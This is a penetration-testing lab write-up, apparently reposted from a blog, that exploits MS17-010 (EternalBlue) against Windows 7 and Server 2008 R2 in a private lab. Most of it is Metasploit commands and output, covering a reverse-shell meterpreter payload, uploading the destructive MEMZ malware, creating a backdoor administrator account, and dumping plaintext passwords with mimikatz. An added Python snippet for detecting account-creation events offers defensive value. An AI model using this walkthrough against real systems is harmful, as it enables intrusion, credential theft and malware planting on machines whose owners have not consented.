Penetration testing Windows 7 and Server 2008 R2 from Kali Linux (MS17-010 exploitation)
Author: Internet
Penetration testing Windows 7 and Server 2008 R2 from Kali Linux
(MS17-010 exploitation: uploading the MEMZ virus)
1. Lab environment
Test platform: Kali Linux
IP address: 192.168.8.132
Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
Target 1: Windows 7 Professional SP1 x64
IP address: 192.168.8.133
Target 2: Windows Server 2008 R2 Enterprise SP1 x64
IP address: 192.168.8.8
Port scan: a port scan of the 192.168.8.0 subnet found two hosts with TCP port 445 open.
Network topology of this lab:
2. Lab procedure
2.1 Penetration test of Windows 7
root@kali:~# msfconsole /* launch Metasploit */
[-] Starting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
=[ metasploit v5.0.60-dev ]
+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > search ms17-010 /* search for the EternalBlue (MS17-010) modules */
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use auxiliary/scanner/smb/smb_ms17_010 /* select the MS17-010 scanner module */
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options /* show module options */
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.133
rhosts => 192.168.8.133
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.8.133:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.133
rhosts => 192.168.8.133
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132
lhost => 192.168.8.132
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.8.132:4444
[+] 192.168.8.133:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.133:445 - Connecting to target for exploitation.
[+] 192.168.8.133:445 - Connection established for exploitation.
[+] 192.168.8.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.8.133:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.8.133:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Professional 7601 Service Pack 1
[+] 192.168.8.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[+] 192.168.8.133:445 - Sending SMBv2 buffers
[+] 192.168.8.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.8.133:445 - Sending final SMBv2 buffers.
[+] 192.168.8.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending stage (206403 bytes) to 192.168.8.133
[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.133:49159) at 2020-03-17 01:09:21 -0400
[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=--=-WIN-=-=-==-=-=-=-=-=-=-=-=-
[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
meterpreter >
meterpreter > sysinfo
Computer : TODD-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > screenshot
Screenshot saved to: /root/ZfhJyFXb.jpeg
meterpreter > lpwd
/root
meterpreter > lls
Listing Local: /root
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 2740 fil 2020-03-17 00:19:35 -0400 .bash_history
100644/rw-r--r-- 3391 fil 2019-11-25 07:24:30 -0500 .bashrc
40755/rwxr-xr-x 4096 dir 2020-01-17 01:40:32 -0500 .config
40755/rwxr-xr-x 4096 dir 2020-01-10 05:37:10 -0500 .msf4
100644/rw-r--r-- 148 fil 2019-11-19 04:18:26 -0500 .profile
100600/rw------- 9825 fil 2020-03-16 22:14:37 -0400 .viminfo
40755/rwxr-xr-x 4096 dir 2020-01-17 02:53:20 -0500 Desktop
40755/rwxr-xr-x 4096 dir 2019-11-25 13:44:09 -0500 Documents
40755/rwxr-xr-x 4096 dir 2019-11-25 13:44:09 -0500 Downloads
100644/rw-r--r-- 14848 fil 2016-07-09 20:59:44 -0400 memz.exe
100644/rw-r--r-- 2527232 fil 2017-09-23 12:50:28 -0400 永恒之绿.exe
meterpreter > upload memz.exe c:\\
[*] uploading : memz.exe -> c:\
[*] uploaded : memz.exe -> c:\\memz.exe
meterpreter > download c:\\haha.txt
[*] Downloading: c:\haha.txt -> haha.txt
[*] Downloaded 8.00 B of 8.00 B (100.0%): c:\haha.txt -> haha.txt
[*] download : c:\haha.txt -> haha.txt
meterpreter > shell
Process 2772 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001
C:\Windows\system32>cd \
C:\>
C:\>dir
Volume in drive C has no label.
Volume Serial Number is F496-8A44
Directory of C:\
2020/03/17 13:48 8 haha.txt
2020/03/17 13:48 14,848 memz.exe
2009/07/14 11:20 <DIR> PerfLogs
2020/01/10 21:19 <DIR> Program Files
2020/01/23 14:04 <DIR> Program Files (x86)
2020/01/10 21:14 <DIR> Users
2020/01/10 21:16 <DIR> Windows
2 File(s) 14,856 bytes
5 Dir(s) 52,709,482,496 bytes free
C:\Windows\system32>net user aa 123456 /add
net user aa 123456 /add
The command completed successfully.
C:\Windows\system32>net user
net user
User accounts for \\
---------------------------------------------------------------------------
aa Administrator Guest Todd
The command completed with one or more errors.
C:\Windows\system32>net user aa
net user aa
User name aa
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2020/3/17 14:02:43
Password expires 2020/4/28 14:02:43
Password changeable 2020/3/17 14:02:43
Password required Yes
User may change password Yes
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
C:\Windows\system32>net localgroup administrators aa /add
net localgroup administrators aa /add
The command completed successfully.
C:\Windows\system32>net user aa
User name aa
Account active Yes
Account expires Never
Password last set 2020/3/17 14:02:43
Password expires 2020/4/28 14:02:43
Password changeable 2020/3/17 14:02:43
Password required Yes
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
C:\Windows\system32>exit
exit
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP TODD-PC$
0;2454496 NTLM Todd-PC aa 123456
0;293566 NTLM Todd-PC Todd qwert
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022920_default_192.168.8.133_host.windows.cle_555893.txt
Alternatively:
meterpreter > run post/windows/manage/enable_rdp USERNAME=bb PASSWORD=password
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: bb with Password: password
[*] Adding User: bb to local group 'Remote Desktop Users'
[*] Hiding user from Windows Login screen
[*] Adding User: bb to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022750_default_192.168.8.133_host.windows.cle_306010.txt
meterpreter >
meterpreter > exit
msf5 exploit(windows/smb/ms17_010_eternalblue) > exit
root@kali:~#
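From the defender's side, the session above leaves a distinctive trail in the target's Security log: `net user aa 123456 /add` produces event 4720 (user account created) and `net localgroup administrators aa /add` produces event 4732 (member added to a security-enabled local group), as does enable_rdp when it adds a user to 'Remote Desktop Users'. The following Python correlates these into an alert; it is an added example, not part of the original post, the event schema is simplified, and the SID-to-name table and sample records are constructed.

```python
from datetime import datetime, timedelta

# Well-known SIDs of the local groups the commands above touch (real values).
WATCHED_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
}

# Constructed sample records using Security-log field names (EventID, TimeCreated,
# TargetUserName, MemberSid, TargetSid, SubjectUserName). A real 4732 usually
# names the member only by MemberSid, so a constructed SID table resolves it.
LOCAL_SIDS = {"S-1-5-21-1-2-3-1001": "aa", "S-1-5-21-1-2-3-1000": "Todd"}
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2020-03-17T14:02:43", "Computer": "TODD-PC",
     "TargetUserName": "aa", "SubjectUserName": "TODD-PC$"},
    {"EventID": 4732, "TimeCreated": "2020-03-17T14:05:10", "Computer": "TODD-PC",
     "MemberSid": "S-1-5-21-1-2-3-1001", "TargetSid": "S-1-5-32-544",
     "SubjectUserName": "TODD-PC$"},
    # Benign: an existing account added to Users (S-1-5-32-545), not a watched group.
    {"EventID": 4732, "TimeCreated": "2020-03-17T09:00:00", "Computer": "TODD-PC",
     "MemberSid": "S-1-5-21-1-2-3-1000", "TargetSid": "S-1-5-32-545",
     "SubjectUserName": "Todd"},
]

def find_new_privileged_accounts(events, sid_to_name, window=timedelta(minutes=30)):
    """Pair each 4720 (account created) with a later 4732 (member added to a
    watched local group) for the same account on the same host within `window`.
    The creating subject is kept: a machine account or SYSTEM creating users,
    as happens from a SYSTEM-level shell, is itself worth a look."""
    created = {}  # (host, account) -> (creation time, subject)
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[(ev["Computer"], ev["TargetUserName"].lower())] = (ts, ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev.get("TargetSid") in WATCHED_GROUPS:
            name = sid_to_name.get(ev.get("MemberSid"), "")
            key = (ev["Computer"], name.lower())
            if key in created and ts - created[key][0] <= window:
                alerts.append({
                    "host": ev["Computer"],
                    "account": name,
                    "group": WATCHED_GROUPS[ev["TargetSid"]],
                    "created_by": created[key][1],
                    "seconds_to_escalation": int((ts - created[key][0]).total_seconds()),
                })
    return alerts

if __name__ == "__main__":
    print(find_new_privileged_accounts(SAMPLE_EVENTS, LOCAL_SIDS))
```

On the sample data the benign membership change is ignored and the `aa` account is flagged as created by the machine account and promoted to Administrators 147 seconds later.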
2.2 Penetration test of Windows Server 2008 R2
root@kali:~# msfconsole
[-] Starting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 >
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.8
rhosts => 192.168.8.8
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.8.8:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.8:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.8
rhosts => 192.168.8.8
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132
lhost => 192.168.8.132
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.8.132:4444
[+] 192.168.8.8:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.8:445 - Connecting to target for exploitation.
[+] 192.168.8.8:445 - Connection established for exploitation.
[*] 192.168.8.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2008 R2 Enterpris 7601 Service Pack 1
[+] 192.168.8.8:445 - Sending SMBv2 buffers
[+] 192.168.8.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.8.8:445 - Sending final SMBv2 buffers.
[+] 192.168.8.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending stage (206403 bytes) to 192.168.8.8
[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.8:49160) at 2020-03-17 03:11:44 -0400
[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-==-WIN-=-=-=--=-=-=-=-=-=-=-=-
[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
meterpreter >
meterpreter > sysinfo
Computer : WIN-2F0T37AEMO0
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > screenshot
Screenshot saved to: /root/FEbrdmoh.jpeg
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 2008 R2 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-2F0T37AEMO0$
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;254894 NTLM WIN-2F0T37AEMO0 Administrator a1!
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317031353_default_192.168.8.8_host.windows.cle_637762.txt
3. Results
3.1 Log in to the target from the Kali terminal with the rdesktop remote desktop client:
root@kali:~# rdesktop 192.168.8.133
ATTENTION! Found a certificate stored for host '192.168.8.133', but it does not match the certificate
Certificate fingerprints:
sha1: cbbee169f5929f8c048c428feb6792fb66ab3446
sha256: 77dfda959a5f9717c08ecb6a224255f2cda71aa57695616e6c1c38e1f97d36c7
Do you trust this certificate (yes/no)? yes
3.2 Log in to the target with Remote Desktop from Windows:
Windows Server 2008 R2
Tags: Server2008R2, Windows, Kali, 192.168, 010, ms17, 445, smb. Source: https://blog.51cto.com/toddliu/2479733